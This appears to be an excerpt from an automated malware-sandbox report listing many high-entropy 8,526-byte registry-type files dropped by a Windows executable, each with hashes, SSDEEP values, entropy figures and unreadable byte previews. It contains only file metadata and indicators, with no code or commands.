                              SHA1:DC8AE12CAD9312755DEFEF0DE4AF42A89CAA0819
                              SHA-256:522D39BA6DE67216CB1AEF4AEE2CACCB60E8266B302963F8AEC50FCE75227E82
                              SHA-512:A6D9D8BB5E1D607CAA091F9B1CA04B7D88F0B029CB0BDB439C1E805827F6D42875C4ADE4DAC4FA0E738E45842E26ED7E332D45BB9CEF02F4F3A52F67B058C9EA
                              Malicious:false
                              Preview:regf.+.(..!..1:......F......O.vvt.....=.1.5]..u..$.>..h..4.B..z....Ml.a...=r........J.02...!..2....\...f._1..............X.k.r-d'.}.2=1.9...,...'..[...M.x.{.#O.N$..E!..!gvq.j.5#a.?.y.i. D.]..(.J...e....`0...d..B..z......F...V..:"....`...[b..^..@...(......O.}\^...5.o$.i.vA.M.8O..'.....5..F..$......@s...33.......8..TC.Fk..M..O..;k@52*...5.....)2'......<Q`......Jl:p->7.+..HB5f...n..*.......~...p..Q-.'.mm.G.`.Q.KJ.0.....~.p...<.**..G..-...]v$@5...Sy.Tq.....#..R.^~....0.[..!B...c.Tb?.Y.....4.....`.-.T...[.E..i..s.....r.M.o............=...b.6.F21.I~...x2..}.R@.....u.H?...q..|.....v=cjN}....>...'~d....E...e.f...Z[u...&.....%.y.....u.P..W.s.wE......m.U.h...............Jz.NO.../5.W.....A......4.W..f.........5p..n&..y~.. -...,..O9.o.........C:.#_..m.U.9,m..L!d........6qk......f3b1rIAF...U.2...k.[..>.`../...+.../..~...Z.5..+.z24.s.....B..'j.;...gJ..;..Q..<..{.../....:~.c.mb.r...|%...Z+..'`>z..Q...*..xj...h..th...os:..ZI.............
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.977185804562627
                              Encrypted:false
                              SSDEEP:192:ES3MqBsVGkzT6oBc7diJMUA/raFPIfXuEucaz3WICf:PvBsVGgT6maf+UuN3Wt
                              MD5:428E27EBEE0A7EB1CD39835F367F7863
                              SHA1:C174477A3A631342C16AA926671BD37F6FE5A7A2
                              SHA-256:BF8E6124EDAD37A0C8194B850F8091F24C949FD97AB067E5F4677B3D0C91A109
                              SHA-512:058E63BEC0FB106A6AC9FD71740AFDB4A0B06328A701CDC67DCDEA52B45AB6294A0E3D2C5B3127FCA428EEE9F6553EDCC8DC448F688125BA4D08B53EAF79D47E
                              Malicious:false
                              Preview:regf...JG.W. ....z|...wd,.;...lM....f ...BQ....5.8Y..U-..?L.l...#....c............u.........G.1..<s.`L.......2.=Q.R...]/.U...cpcj..K.........8...@.."}.T<T.a.o..>....}w..i.z.W\.\:.}Qg.-....p]......y....=.e.A..6.V.......9e.p.P2h..Zb..hl..5..F.[?...}.dE|...r.....1_.C...S..?S.........4.v...^...J..T.=...\..[...).~....q}./Z;Xb.e.D....,.O.....R.<...5\H....q....A....*.,...+A#..s..-..T.......`B......0.+.f.ap,....2V..&u[<.^..........>Y/5%O-...e..:..C).Ti<...1>.Kr:cj.*..._....2......0.uZO=l.s*......`..z....%...oA...\Y.M.~...F.)..q...7...M.j5.A...(O..vT.1......bk....>8.m.4~~....M5)9.u.!.vz5:0..7....~..%}#.P....PFO,.(.^.-....#|.uv...3v...6\Y61Oo.-Z..-.R:~.GD.......Y>..1i.>...@!..5G..dR.5.3.%.&V\Y5....%...W....A.4l...v./7.a4V..8..lj.K.=.lY...M*DR...D.'!D"+.G.....E{..vu.g.....azC..&.l....u.".....!s....U.....g .8.}..@. ........]8...+-#mGz........1e..)OS.P.%...).SF.._>./..5:9r..I.#.N8o@R...e.S...~.F.4|.L.....O?...;....q....pz.<...aMr..w.:..J.....
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.978029079634246
                              Encrypted:false
                              SSDEEP:192:2SQcZvz7w/8J+U7y4BfVpG18utV8NCn6y51ye36AZE07Bf:BQc97wEJ+4BbGGi6yXye36qd
                              MD5:BB13A467B9567032AB1E6FD9DD129C42
                              SHA1:154ADBF90D26CF9C16F1F7E2C9C04CA538531567
                              SHA-256:8B77555882BDCF0F9A11D083EFD8EE0E11174DB31A638CAF1ED69376DF8119C7
                              SHA-512:6C32E146949DC29FBC085AAC31B53F7AB9CDCC8F34235181862C65C1BAA86B0A49EA780B1F11E3F9A5BD70DF808D11C2E0E2F0905FBA5294AEE7333A84583C6A
                              Malicious:false
                              Preview:regf.V...zO.a..}AG....@..Z..S...Pn...gE..7d.|i...c..>..C!.pj.6..+H.K.&..\..xd.k.e...M.H_.@....@JS.*:N.4sQB....q?b..........9....7;F...........X.)&+..w..0.k...&.=.../.^.....&v.v...f.=....o.j..s.@X........,6zw.....h..~;3.......m...zW.EF..M.....:m<.k._...kb{M~..8.'...b.]1...?D...,t....g.9....1..,........S.........<...3H....$..n%P.w...?...J.=.Q.:.nh..a..t...8vZ.p.......P. ..|U..c&.&.....X.~B...j....]...."...,.....l..y...L.L......x+4.f.........r..F..........`K...<....}..).....)if....c.xf...)I.k..A...uR../4... .1.;.I...4.,.......[.F.U.%:N&...C]Q.....,9.|m............s ....0v..Bc.1.V...m.8..e..DR&>.6<.No.fw..-.a.H....i.)..Ar..Lk8.....4.nf&,K0.G..om$o.A.D..:.<..c....&Pu.. .,.x.{...D......9....Y:Q....Y...U....#zy!.|X.....;.r...8..(....w..+...<8/z..U.<..W.....4.!.eqb.......X...Il.e..:.=.Jz..y.^l...8.;_...`..1..=..a...H.)83[.>.0~["G.....5`4..\..h....... .Hj...8....M...5....W..)[.S..;.Gt..D>..@|e.h..P....8&.Q.M.y.8..@h`..I..k.q...8.j...G
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.977981181268196
                              Encrypted:false
                              SSDEEP:192:k9EVObSmgMcdaHDAf4ewJLLkled9GzeEqkD2vCNWkMUTGPf:kqUb/cdaHOBwJHh9GzeEWvCNWDwGH
                              MD5:D96D172C7FBD18C13A1D94F9C6095973
                              SHA1:244563E779E076B798A4DC6E2146438DDE8A6FE0
                              SHA-256:041A19C228145415D413F83B7E77BC6936DAA0415FE414D1277D948AE48451BE
                              SHA-512:1E2347BC328D99AB0FD477EEAAE7229EDCA8ED40A03AD8DDBD50B17144649D4E5D90264F7973975EA9818108F6D1D9271DB48F46EBF69C15B9BC3ABF85309AD4
                              Malicious:false
                              Preview:regf....t%N..).RWf....p....?.(]Q....+#Y....).6.x..l..n.C...e...]....n....;...Q.q..V=....3}SZ......T.L......9.^8..c...wIR...R@P...4.....rxv../....S}...CT..]......(?....BI...?....."U..~....%t4..Xy..k.;.a.:3.f.......&;.m...5...X'-..uc.h.....-..yE.&..M."..M..'L.l....0..H.`..1.*.bGC.e3v...............W.O.).R...\.V.....8....+.vB..:uI.o.$... ..QO.6..k=.......v7!.VmX3.....|......<@1..J....cx.15...v.#...;.....o.yx..@9..h.v.iM-n...: .X....Z.....5nsv..T[._...Exkp...0h..'.r....U..e..,.....W..E..{=....%.+VHeJ.N....S.`....B.6.N.D..r\x.-i.~.:d.k.j.... ..U.....Q..p.E...3)..9.U.J._c..1_[.|R.....8(..4~/..Y_..(U....v..|..LLm..c......^...p.8...k..b\.kF.?..l.}.r..Cj>1J.... .91.T..F.L....GZ=Ep.wB%)K.%..m\.%.5.&..O..y+..IR.P$|..:..m..d=).5>5|..R.../.=.x_.$b.Fng..7y.e..Mw..@r...UqU.KH.`MB:.4../.....a.v-..7.|N.s..^.l.".I......H...ie05+...f..(.M....wl+k...h@=.0Z...=z8...QM/..=..%>q....NN)8..qc...p.\H.*LU.A.._5.G.P...-...........t.?.......o.J6&p..8..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.976039450485483
                              Encrypted:false
                              SSDEEP:192:Ft4kdabiTpnFxnsrJ3MygfcZhGDT8L1RwiLMAf:DwYnFxnM3MwL1BLMS
                              MD5:B24BFEE31985D0EB9389AFA32D3196EE
                              SHA1:EFD9FC685DCFB7C2D535FC004AC4C1D96C199349
                              SHA-256:F06180975D05040879427AAED52B6B9879E8E400C24463144662216DA602578B
                              SHA-512:05FF2F1DAB4F52EE2DFC60AAD2C77A64E660076CF2066F76EE4A5BD975E404741CB61AB85866B7019583492640F4015F3D03D565313DCCF8A19E42BFFA682B0D
                              Malicious:false
                              Preview:regf.1..#w@N.M}....W...p...7.Bq&.$|;...sx.m........5l.j....d<..........h|X..C.....I..8..V....x3R.h9d......&$.ge.t +...Ss.n.;.6Je..},V..!u..pW......l..W.....Vx..I.M~.+7......2.[y-Ec....GZ~Q..(dQ..j..^E2....\<..}...h....F$......U.c+...m?..~..{.b.....N....}...yE..|v......R.g...I...i.m.m.'.x<...M"q2}.g...]..|..?....6I@..]...a.S..,.fE.....N..]....M../>..>h.K.V.G.H.....6K....Z..O.RD..2.o".<..g .}.w.......* -..i..M..Eo.Xf"....d..*.....t3..iv..$....f.....p.'(.:.8..A.:}.E.YV....V\..x..@...`.8.s/1A)...p8.44..6.BE....[....I.../..\.4..\....4...n[...7."...&Te.yG..&25...z..A....I...Q....d.dF..A..i$..b.n/.GL..c'.<.Ed..p...`l[[:....@...8nR...3.#..1.<.*...J..N<Ut.}.%@..j..v.........{K.'...,........,...-s.. .a..;...Y......JR._/..l.....y....../...V...J.g(G.!W@....b.Qf$...:d.........IXrH..~..."8.....W..9&Cf.t...s4.w.r..%L../N#...h..'...........D.....O.V`...;.fk.4.(...2K..=FLY9{e......hY..........|.;..4.Q.......i_.]........B....4..b@....|.C..".M....Q...B.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.977828762773068
                              Encrypted:false
                              SSDEEP:192:r/819TkUFmW21aEPA6HzMuNkMpfQRODGdoHPpQqHIaNl8f:7MTL6jY6TMuBpfQROKdyKgIMl+
                              MD5:D673ABE61EAF1BEEE4E0BE8594E30D9E
                              SHA1:52706F38ACA660E0780FD48D8D532C2348CDAAA8
                              SHA-256:53A7E376AC001A895503A57CCB27AFB40B8A8BEC02F841A1A6E2773E5A6B29F0
                              SHA-512:20FE5709F71E95B386DB3167F7AC4B1DD2129B7CCC4120F3DC8CE52982A7BAC118BD233D0A0540232D29896189BFE0D1682EB025FB87781BFAA27E0B5D3551D5
                              Malicious:false
                              Preview:regf....D....b....e.nh....'v.O...[K.c........W....+;....+.N<....#.J...>*Q....zV..i...I...b[....c.".Y...p.a._..G......_6....[.e..H....T.sm.g.......~I...A..'..4GJ.6H..?....\.`@..9s1.M.a..5.?<.%>...o...[...a...t4.0..L.Qt}....Wzzo.D.g.}4D...8.8..S-................+P.+.~.."..Uegc H...O... D.....b}..Y,.B5=.Q......O9f.....0<GW'.r....5.(...R.......].../..4~Z...A.D7...........G.$nW5,..A....n..i..0..P.].L!..E~...?%._...e..V..:.T......U.............5T..ix..g|q...r..|n.c5...hD.+e..Nv.lh.r_..N...F^l.SI.N.....CI.F <L.g{...p.q.....5..5...b{z.t4.W.6w . .s.`_...5.!>G.p.....m......1(..j..=.(.Xl._..f..lCe^..N...F@F.0...GMh.@.B8.V.+,[.>.,.I].S.S....=+[.^.|..X8.H...u.....s.:&{g-.w....N&....+P0I.....(.;$T...$.e.V.LK.\<...b..m..}`p...D....U.Z......=...e...V!?.-*.YF%k#...]..pG...#.XQ..D$-$U.....H..}...1^.A..<..9.........sIYm...oM".c...q.m.Z.!d...O....1...z.U...D.u!.{..".U..+.U........5.a.M.....5....\To\E+...]d-.......52.]C.z....*...M.K...Z...W:F.z/....(B...
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.979008005856588
                              Encrypted:false
                              SSDEEP:192:+Mjz2PywjzvCuSDc182mzDEw2AwF2Kj5wiu8WrgJ3wWhf:+MMyAKuas85Z2XBGj8WrgJv
                              MD5:656AD07FEBF50C683E9DDFE3E846AB91
                              SHA1:E3DA9915599951F5EA3F5B50BFCBB9740067BC1C
                              SHA-256:D739E9FA311970C70747903B6971AD2D215E8859816D8D381D872C951B261EB9
                              SHA-512:4066ACA152FBFB3735F580666C3662CA304D87DDDC74B30CF902231FD2DC00DA2A13B18027B30B1A7CFE1A898860D00A998B0B3737CDF2216E1318D656FDAED9
                              Malicious:false
                              Preview:regf.....G}c...6:CO.h.Q.\.A..O..,.k..z.*7-<...C..P......`!.......zG.a.......[.....C.....O.U.2.....a.P..,..Z.k..r...A.*T8.Q....+..0.........".?.#..r}..=&..&....{=a.......~\;.....Ty......w..P......S..M....b'......y.sv}..!..?.5...y..T..k.,D%.E)..V..{QS.......A...s.v...9n*{... ........kh..pf...5..3_............-..hJ..p.X....(.}..;.. [8..j.*...~.._N...g.5.q..@}......Z*..l..wN:......"Xv.}.a..j.$L.?...5L..s...v....)...sg...D}.HO.ot$..C.8[b.........}.'R..>3.X.j.Q:..R.\..n...B..}.h.$.....Z.Rc..ro...#..g$P<.8.:m.:..........&...TJ....I...[.......I... .o....v..........mm.Pa L^...~.i.....K.........qo..ZWZH.$.0t..O.."eeZ]@5.k..R.. ..K~....`.)[Y......2....pm...X...$.6.,.UtJ.......ZZ..r,.........wa.[Z...,.}.5V.X.[.I!.v..Z....X.ul.>B.~.....&....oQ..9..P.2.r.6.a]'..Z...C..P...0..w.....e)n..|...~.....t.\..A......8.P'4..g....o.....9R.Q1. 3.i....+.],.N.n.Ri87:.lq.(.C.....u..iR....s.....E....%|..2xA|. .F........*....C..q.e..mw.).>.Cem.-]*..<0.&.d..o...U/...k>.R.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.977439155773886
                              Encrypted:false
                              SSDEEP:192:mqNdvB23BQrM8jNx92XgvqmZ7793/tl6mb3+65xUsO2KSf:31Y3BEx92XRuFl/3zxUsOc
                              MD5:A2D164E5392E7655F1BB50F500B71231
                              SHA1:0FBC17E22C82FEBE284767A8461DE084937D7F32
                              SHA-256:81DE3DE25E1C05B3451EDD3DBB0CBE44A5E9428B9FAE9F1B7A4E1C0591B7DCA8
                              SHA-512:ABB1B8F04E5921ACC66DC95E5506D903C141958F59BB0A16884548BC8E02CBD2B4719E30F688787508F0437A4BF8D80A05E48531C04C66445F7A4D7ECD363B09
                              Malicious:false
                              Preview:regf.?H...?.{....;3......K.........p$Sb..e.6.`..r..@rCV.......x.VW.K..Z.E..*..Yz\.\.m</U.h.P.X..=S;..R.....b..D.....7..=uMKt..........Q.D.....l..o].Z...e....3...H......`.=.Z.R.p.9<[es........*.........g...f.y4v/er..E.8H....b..0O.C._#Z.!..o....t.g..-....r`.....f5zM.I..m.2'.2p.s...P...P.....Q6...u...3=X.B..w%..........n{....5..:X3.73.+^)OZX.....DDB...bV......L....+..|....._..\.AU...2d..i..U.]....n.....N..>.R"...:.."1oA...d...jD......z.=.q<0oc...{9.D..e......kR....zb..q.5..Fv`......A.....{.rD....-..k...?...>.l.....!>..?.....9..D...uu._../6?......!.B..V2.+J_x...Iohg.Be..b.z.iENKc.n..z..f....m.dm.Sc.3Q+a.:~.........!....nb.._.'...W...1..y...L..q.yU.........*A..y......>..#.m.QZ..h>Xz5.N/......h..@.h.i......eU.+.@.q6_.u.........v..M<.I^..B...m..Y....l..2..\J`.....::.n.k......-...G*./....4.....t;yC...@}..zrh.UWn.X0l...ign....[5|...v.&.!.B.~WYjB..<-......?.,Mo.7....(...0....9...T..L.p..1:7u.....7.g5.......q..4..H.i........k.9=...O..J|.c.<..9..f..C.t.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.9798597218876
                              Encrypted:false
                              SSDEEP:192:A7trJKvp0PHRISlOSEhCdm4MysKX5JZntzkjc4lId+Tgf:otZPHRI0w4xNF4c4ix
                              MD5:0966DA7BA7DEEA8271720465021A1D72
                              SHA1:9D2A5B29C16BE4F5FA52F25597A39410070B3283
                              SHA-256:E42CE20CD688A2CE2EB9340CE1F6F2B8F71BD14831D6FFDF898D8736391F7D90
                              SHA-512:51E988C0425A10FCA88C10B349601A0479C470B90AC0BF9A34CC39D2CF22418D6363D0925A90E6FF51DE88AC0B9A031C32F567AD461CAD08885CA54F2593FF45
                              Malicious:false
                              Preview:regf.>.dU.....D.p...}.;.``..:+X....d..,..q..\.......T..>....:.B.....\x..i.42..Z./a^..VQjjx|.`....N4.V.t..........Q2u.......9..E.....0@..W.....S..9.}.....h5.P.......x...W.v&.........P....%..sy..]$.`x`...B.Jz.3......Q.z.8.l.p#........4C.&...7]Y/>....5..ZM.<<.?.......8.....G,._.wl?.C...@.).*...dy.k...8L.....%.Iw.D....M..w.)/........Mh..{..gS..ERp.g.H.........$.......I.zA/..e.b..Se4.........+.&."l.......6{b.....-.J._.-._..>v.....4.T..y.....!..y.....".W.:{b.......,......l)...w.."h.)5..>S..x.......5.@.Av.1. .e...............=......?.....E.*>.w.;)2.$85@.o9...N.....}..........b.f/../.=?.,...T..z.O.:e..d........&..PE..K.Kl.I...oq..5N..^.}......r.r(.W!.T`.p...B=e.LI.|.._...K.N..q./(.]...9....<.7.....FDF.m.H.+..B....-6.wos..,.tU.......4.....'#Tl..%7.y.P........~n.oS.../l...!tuo..W.T_co..(.A...rH{W....N......0.b...*..h..~<l.........Fp.vF.m..,C.P.....>..xz......IV(*........G.N.....W.....f..iN..^C...7.?+.;.$.........YfQ7".`..g..p....B.|..[.eR...x8Y..|..2..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.978464759262524
                              Encrypted:false
                              SSDEEP:192:H0MT17RZdN5C6SZCtDDQlZQb4dEk4glrf4mrCZvg8bf:/bDTwZs+A4Ok4glrftrCZ5z
                              MD5:F107EED505FD44CC40AE100D0A53B088
                              SHA1:4A6ED96022419069110A630CD1307E13902B919D
                              SHA-256:1DE40684F615F01282B9C78AE9037BF2EC1C6D4A0423944BA67541EA4A47B9EE
                              SHA-512:BD1ADD8FA2440D93E7B6D994F6E4E4FD1E78F55A21CFEB74BB93A6842A4D9196646381F68B50818281B4BF1C9E52E09F016789B637B30DAC9016780B218007B1
                              Malicious:false
                              Preview:regf...@..0.O...&*''B.....P...%Nl..#.=..{...e.N.$...x....H...RN.....k...N..g.t..j.x4..W.ZW....`...X...y...;X\P%S.......Z.Z.4.7'..(...s..gv.^...~..K.lA.y..Jq.k.f..L.j'.6.P..l...*l..<..4..o...WF..t.8`.F+9...".$nr...`d;..P.......U~...]#:..w....P8....4Ki.q._.C..../.....w..."...`.....y.......]..@...B..1.A).|.,.u.p}3....W6m.X[Qe....,.V.+...../...j .N.]d.....R.....X...j!.~;...,...4.W*.3..Z-....w.zC..d...$.%.T.,LV:D...k.p...LAb@.I.....}..$.7..p..w..Tm...:.....z.lr.d..tG..Nu.x.I.....h_.N..9......7..li.......%X.g..l..7]#......n.....J..u.{....x....Y....3....?........M)|.+I.z...[(%ns....&.K..cM.do...+...H....)..|ToF.J.P......TH...\1u.(7$;.6q."....NM.&..n.o...[D...v...@t.F.....5....;t.KL.].....Z..6#'n.=.>.{..Xv."....L):.}6Q..."5..`.B>p;..<..@u.`.....WLf ](.......C.=...........f..q(..i}...oJ.Y.-.b....b#M....H.\.....#d......!.Y....Rh..)W...q{.U.....O.ep./..'..z......v.HJ.A+........n...|s.._.)Bl...0..{.~.d%l.v_....+..."...2H.Y.L@..~..n..wU./H....s@..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.9829670004813185
                              Encrypted:false
                              SSDEEP:192:qJD8a38HR66cTnbKCfZbgTn9+dXYpPeeZ+1u6ogef:MD8a+66OneChrapWeZ+1fogI
                              MD5:9446C362D9CD0A48495AB3713DEE25CE
                              SHA1:289C40D8523EB67511A5FFFFA1C9C5E916888914
                              SHA-256:158C7432027392E9C7928B44C95F7CAE9F22BAD5FB2C939D21C93F0D5E8D36D9
                              SHA-512:4033624775F70819FFC0152DDF452CDE00983097153A3A27E2768298991F37613E4B9D7D0972A79A6C40874CD8E241924A666222CCC576B1612D0B176F34CF15
                              Malicious:false
                              Preview:regf....,.Xh.S...:..X..U.x.o.;..B.'~..dqo...%...........E.....).<X{..X......a....#..>$.....l...<.f.[..X...f...H...7`41.-.....P.3...k...N....*.....`..4."....c....k.`rr.C.,._...`..B..|.p...f...P....c.\^.=NM....@8 5&.[g......4.S..P........rC?........ep.)."z.....X|.}..-.o...3t&..^T........Naz.Q&U.U.....H.?F..Y..b.g.<.K.X.....q....I. ......=..+.L..mq.~W......_...9.P..A.$.DD%.q.."I,4.....k6'.....Q..o5..2R..!O......(.....J..,....4..!.......4p\.....D...7c.<.:......`2.o...Yf0.....E.......Z.../...P.fpRI..|.ZKk."-..{....u@4....c.......u./.......Y.>.q.E...j^.8.U...&A..{M...U0...........*.h@.(....%.Q.py5...6d!t.V.H...'|.Pq.>&*..0...@}.%1g*>..=.)......=..R..v.!.7.q..4t......s..=*.O.....B..........a.....-m.".SY.....*....... ...r.(2...Ic......7}..8M.D.~S.pt.G[.>}..XpZ.~..DS...{..y..Xh.#.X.........4....GH...x.....Y.../...c..A..&.!.j.z.lL.M.P..n.\\.a..g..\.~..(...6~|[....;.A1w;(..Wq.\v.d.XZ.$n.kv.9k..X.f....Q.....@...E....O....3..'.;!4X-...
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.979738579943268
                              Encrypted:false
                              SSDEEP:192:rTdnK3mNAbalT+rguyWX87Kg3r/plXZpTerzl4T8YqESBf:f0R/EprBXpTePmTWJ
                              MD5:9013873D4A28F04BBA79CC37A44B6986
                              SHA1:DDED32A7FB51D78193531CE1028000A576A57CC7
                              SHA-256:8512764F8C11C6EE5E7160F2A27BA9D0B9111C9ADDECCA37940F89E376FC451A
                              SHA-512:7C9DCEF104D11B15F4BA73CE3AC5A8DA8812737F67E74EEB8641471EA9C2CEE7368B43917BC7452CBB80F643CB2A7279517F35DBD2B4500C5FF1717393791058
                              Malicious:false
                              Preview:regf...}..O...$=(-.b...S.k...`eH....r.2/.P.o4Z.`G.. .......O....k$,.d.h`.@sh..........\.(9.7W......sW.'K1....Ms#..K4.|*..aU...bN_o.v..bqXc$...Q..q{.yD#C.Ha........I..._.,J..Fo..(fHT&...{-?.s!.l...;./..m..".....\...?t...(....,Qky.:.8[.....x...+....`ey.+..1c.Eb.q..T.F..@..'T....... F~c4}XoSQ.I....+..|..P+.gb.}e..)..<..af7....xO..c..~.<..j.I...i..oj[2..ki.q.D.js.t6...V.[T.|S..F.K.3.Z.....a......B.m........c.+3.9.|]..3.`Y.o.P>N...HAW...Zj..uu..z..m...wS.....n..tg".Jq.......>...A..<.u.L.>.+....-A......1O.l....>._...6..!x..{r."..&..m....n!i5X1D..6[...Lc.Q...:.D.J..C..`.f~xs.5G.....B+....o>O. .=..~(J<..B....R..ga=......#.U~....oL.N.2i......r...L.:..!uo.q.k7=.......P....mY..4.,.qg;.[........f..$.l.....t.(/...Z_=U..p...,..L...P.w...iK2P.Qb...d.Xd.3.....-...zW.G.....z......2 ...P.....mw.X.047.,.>.98%.g....h...............N,OPt>....%...'b-....7...CS..e..l/22FqZ..]/>/..-|>n.8.h...@.Y..0.v.[...f....hf(.Y......0?..J..{.......X....4.Yh~.1.o.Br..p.`fk
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.980405051727985
                              Encrypted:false
                              SSDEEP:192:Eos2iDrE9pRXLNdAEdKFQZ6ItCHOpji48tB3kA94bgKaaof:nsZOzXL3A6ZVtpjWHkDk1
                              MD5:8213184CB489A9427B372E4839CC95F9
                              SHA1:8909A33105021A86A74C4ABC8CC106CE857DABC4
                              SHA-256:BE89BC5FBA6E669479B33B76AD3418C5E66963915A0FEC3B5B12AD7A530F0CA6
                              SHA-512:19DBC6A66A536D08110CE255A0C65F5539FAB18829F3C644A4D97EFBC89184F21AB2FE78264CA823B1E8140280F5B6C8AEBF3BFA9B0B62F5B89172D911C266E5
                              Malicious:false
                              Preview:regf..Q`.^.9....w5...j.....:r..R...W....3.-.....`.(5:2T..%bV.J./~`$...xQN.%..r.%.'. .n.7...0.....I..so$.:.E....OQ.,c.]..I......M.....6.z#K...s,}..5!N.*..xMz.q..V..8.r.<].?.xV....)..)7..+c.8l.....E..C._..xAT..}S........G>g....h.&....nq3......[.....fq.g0...... 0.3*.x%@k9T%.2.*....^Yo.S....v....d.r.%.....H.I4..$..(.....N.}a.5...65.w'...O...e.XG....:.|....f7....@.mh....tx..5<.jg.....kd..u..?.3.Q\...DL.(...fO{.<tZ.#..4../.....O-...:$.o...~p.m.....rc.5..F......._,.+=b{ka..A...l.....%.3..*..~./.....Px.I..........@9...43 a....E...5.L/ >{<.n...p.G..V0....]9....S.>.......N.i.u......VL.5."#..#.E....)..:.<..q...?!...]....V..od.. o.......'.c.]r...J........*~y<.{......Ui..0.....F....yj.G....]...=@kGl,..4..M....p......g..K......0=.V...A....!.+...c.l_....v.u.'o.u..I...~........tri.x....;.D.yhqs..G&.b.0..P.@bA.i...4l....Y.?...D.`.;.l.oa2K.L..g......b..s..y....N....%..0..e.n.....ES.Sy.DJ...u..!..kM.(9.t._....j=..^Y...39..>6.>..*=.E.V..*...n. ..M.....5.=,.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.976497868859813
                              Encrypted:false
                              SSDEEP:192:SYmTRwbyIxyJ7EQFnNrtyR2ntBhIOrWD+wcpf1tZPjktkef:SJTR/J79RyaBfiD+wc51tZ4yI
                              MD5:7A19BAB82E9AE52B8DB5001050EE4407
                              SHA1:15BD44EB202AC6DAE0A8DE72EF440A71EA1D8E55
                              SHA-256:CD3150F340A43F744511687671E97A298FA7CFE22BDE8D1DB79F0B43174FF0BA
                              SHA-512:66650D37DF18FB3D4E86F9C17E0616F10EA4A20410A2FC917D16AB658141F834F4734E6967720452E8F01B08D6193FF9FFBA67471FA93431DDFC2FECC20D9E80
                              Malicious:false
                              Preview:regf....&..>.......r...l"...6.f^@..I..9..c=....O....@v$a.....^.5.2.l...L......,.U.; .{.J.J.*...j..,...P....M&...=..3.^....".....B.U....6";%.......D==Q..\t)..P..D.n.f..\.w6....3.k......._.q.>s.u.}....g.........gS@...(mF (...{.4.....W.l..<.J-...C.........C...n.c...4Y..C)..N-!..y.(Pb.y.[..%~.X.....<....1.z.......n.RP.F(....n..f.A.!.]..G...o.j.%..W/.%...xb...pI.Tm...9._P{.=.b.K.._..@...c..t.....!.tic0c0.Vo......oL...t.n.f.h..?.mx~.....).@.......~g.8fr.SY.P.6..m. c...).CD....].Ea...O.Fq.B............-L.;...-...i.<.vd. ..k.cK..5}'..@.:....kU..6;.f.f|.3..R...e.d....C...T..jm|..kU.'.0..i3..6..~..2..JCX..*Q...HN...."t.......`..]..5.....1,$.e.u.P..o3..L...;.....!e..U.W...:fQ.N....[GZ...h...:\.D.+".......P.8.........{.H.h..........~.......00T.r{s.y.e.......UDn.W...Ji.?.g...7C..?.0..Dn].....2k.g....._..n..'...wf...b.v...............J.2..........>VC..d...3[.$..TN3v...} .g.ei.5...Z.LyO=m..:...H..SK[z..B.E..Y.q.<QVh..g{...'......@......A...Z=.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.975809663689555
                              Encrypted:false
                              SSDEEP:192:A3sbLu34cIJdeRZaXjlk3vPl9ISrrBgzvWi7qssXyo7ZYmYwf:D/cUdevaXjlk33TgzgBCo7Zdt
                              MD5:573C5B79EB2BB2983A0DFCA5E3DCE0CA
                              SHA1:62964F5851C667D5AFF186CC37B239D400A8A5A0
                              SHA-256:9A0475AC668223340381724B125716BF98B7149DB4CF194DAF9EC435F5A75833
                              SHA-512:E8BEA067D6FA21A1658F3A0943413AD85F048CA7AF5C1472EAC4605B2BD53CD28D95F74762590598BD57C287A6CE8AE347F42CA9243F2FD10661982A31959538
                              Malicious:false
